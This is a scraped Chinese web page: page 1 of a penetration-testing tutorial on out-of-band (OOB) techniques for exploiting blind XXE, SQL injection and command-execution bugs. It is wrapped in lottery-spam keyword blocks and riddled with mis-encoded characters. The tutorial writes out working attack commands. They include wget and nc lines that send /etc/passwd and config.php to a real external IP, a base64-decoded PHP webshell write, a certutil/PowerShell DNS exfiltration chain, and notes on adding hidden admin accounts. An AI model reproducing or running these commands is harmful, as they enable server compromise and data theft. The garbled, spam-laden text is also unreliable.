手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中

带外通道技术£¨OOB£©总结

来源£º本站整理 作者£º佚名 时间£º2019-04-24 TAG£º 我要投稿

在渗透中£¬经常碰到关闭回显的漏洞£¬常见的XXE盲注£¬SQL盲注£¬反序列号无回显£¬这个时候常用到OOB带外数据通道£¬带外通道技术£¨OOB£©让攻击者能够通过另一种方式来确认和利用所谓的盲目£¨blind£©的漏洞¡£在这种盲目的漏洞中£¬攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果¡£带外通道技术通常需要脆弱的实体来生成带外的TCP/UDP/ICMP请求£¬然后£¬攻击者可以通过这个请求来提取数据¡£一次OOB攻击能够成功逃避监控£¬绕过防火墙且能更好的隐藏自己¡£
本文的中心是在各种无回显的漏洞环境中使用带外通道技术将其传输的一个总结¡£
一¡¢可回显
OWASP TOP 10
注入
对于可回显的注入利用基于联合查询¡¢报错¡¢盲注直接利用!

xxe
可回显的xxe直接引用DTD外部实体声明£¬常见利用方式£º读取?#25105;?#25991;件¡¢执行系统命令¡¢探测内网端口和攻击内网网站

命令执行&代码执行
代码执行
常见相关函数£ºPHP£ºeval¡¢preg_replace + /e模式¡¢assertJavascript£ºevalVbscript: Execute¡¢EvalPython£ºexec
直?#26377;?#20837;webshell可直接被中间件解析的脚本

命令执行
A. windows
1. 信息收集net view #获取当前组的计算机名net view /domain #查看所有域net user #若如struts等给的权限高用administrator£¬直接可添加帐号£¬管理员组£¬隐藏克隆帐号等操作£¬如struts2漏洞大多数为adminisrator权限参考文献£º横向渗透
2. 读取文件dir /s/a-d/b d:*.php #查找所有php文件位置
3. 文件写入& echo ^^' > "D:\phpStudy\PHPTutorial\WWW\shell.php"等特殊符号在cmd下需要转码 而且写入文件不可带有:等特殊字符
4. msf等后门

B. linux
1. 常见函数£ºsystem¡¢exec¡¢assert¡¢shell_exec¡¢passthru¡¢popen¡¢proc_popen¡¢escapeshellcmd¡¢pcntl_exec
2. 特殊符号£º|¡¢&¡¢&&¡¢||¡¢£»¡¢'£¬"£¬()£¬{}£¬[]£¬输入输出/重定向£¬通配符
3. 敏感数据获取echo PD9waHAgcGhwaW5mbygpOz8+ | base64 -d >shell.php #PD9waHAgcGhwaW5mbygpOz+是base64编码 linux文件名不能带有/(斜杠)
4. DNS等?#20013;?#24615;后门
二¡¢无回显OOB(out of band)
倘若在发现这些漏洞的时候£¬无回显£¬这时OOB就登场了£¬常见的方式是HTTP¡¢ICMP¡¢DNS£¬ICMP隧道一般会进行防御£¬TCP在甲方中会有严格的防火墙控制端口£¬HTTP在甲方中一般?#19981;?#26377;严格且完整的监控和阻断机制£¬DNS隧道在当前环境下£¬由于需要解析£¬不会对其进行拦截
HTTP
使用前提£º无法回显但能出网时使用
Window内置
explorer

查询文件位置web历史记录 会打开目标浏览器£¬不建议使用£¬且内容过多£¬循环导致浏览器卡死

telnet 模拟HTTP请求需?#30475;?#30340;交互性
CurlCurl 默认不自带£¬需解压添加环境变量或安装curl –T {path to file} ftp://xxx.xxx.xxx.xxx –user {username}:{password}-T通过put方式上传与层地址
Wgetwget指定header头查看日志回显 wget -d --header="User-Agent: $(cat /etc/passwd|tail -n 1)" [[[[[http://120.79.206.249/1.php]

wget --header="User-Agent: $(cat /etc/passwd | xargs echo –n)"
发送post请求£¬并接受post数据wget --post-data exfil=’cat /etc/passwd’ [[[[[http://120.79.206.249](http://120.79.206.249)]
powershell这里用的是dnslog原理ipconfig > temp && certutil -f -encodehex temp output.hex 12 && set /p MYVAR=http://dnslog:9000/!MYVAR!](http://dnslog:9000/!MYVAR!)]&& powershell Invoke-WebRequest !FINAL!"
nc系统可能无nc£¬且nc被监控的可能性较大nc -w 1000 120.79.206.249  config.php
dnslog

根据原理只需要搭建一个上图中scholar域DNS 服务器£¬并将要盲打或盲注的回显£¬放到自己域名的二级甚至三级域名上去请求£¬就可以通过DNS解析日志来获取到它们¡£其本质就是利用FQDN想域服务器解析为iP地址被记录的过程
DNSlog搭建
在线?#25945;¨ceye.io
在线?#25945;¨TOOLS
SQL盲注
不论是bool型盲注还是时间型盲注£¬都需要频繁的跑请求才能够获取数据库中的值£¬在WAF的防护下£¬很可能导致IP被ban¡£我们可以结合DNSLOG完美快速的将数据取出¡£如遇到MySql的盲注时£¬可以利用内置函数load_file()来完成DNSLOG¡£load_file()不仅能够加载本地文件£¬同时也能对诸如www.test.com](http://www.test.com)这样的URL发起请求¡£这样的URL发起请求¡£](http://www.test.com)这样的URL发起请求¡£这样的URL发起请求¡£)))

[1] [2] [3]  下一页

¡¾声明¡¿:黑吧安全网(http://www.rliwo.live)登载此文出于传递更多信息之目的£¬并不代表本站赞同其观点和对其真实性负责£¬仅适于网络安全技术爱好者学习研究使用£¬学习中请遵循国家相关法律法规¡£如有问题请联系我们£¬联系邮箱[email protected]£¬我们会在最短的时间内进行处理¡£
  • 最新更新
    • 相关阅读
      • 本类?#35753;?/li>
        • 最近下载
        ¹ºÂò²ÊƱȨÍþÍøÖ·
        手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中